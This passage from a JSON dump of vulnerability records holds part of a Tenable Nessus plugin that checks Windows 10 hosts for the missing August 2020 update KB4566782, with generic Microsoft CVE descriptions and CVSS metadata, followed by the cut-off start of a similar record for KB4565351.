vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. 
The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. 
(CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Shell Components improperly handle\n memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. 
An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2020-1569)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. 
An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4566782/windows-10-update-kb4566782\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7fd4a47c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4566782.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-08\";\nkbs = make_list('4566782');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"08_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4566782])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:32", "description": "The remote Windows host is missing security update 4565351.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with 
full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists on ARM implementations that use speculative execution in control flow via a side-channel analysis, aka "straight-line speculation." (CVE-2020-1459)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. 
The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. 
An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfull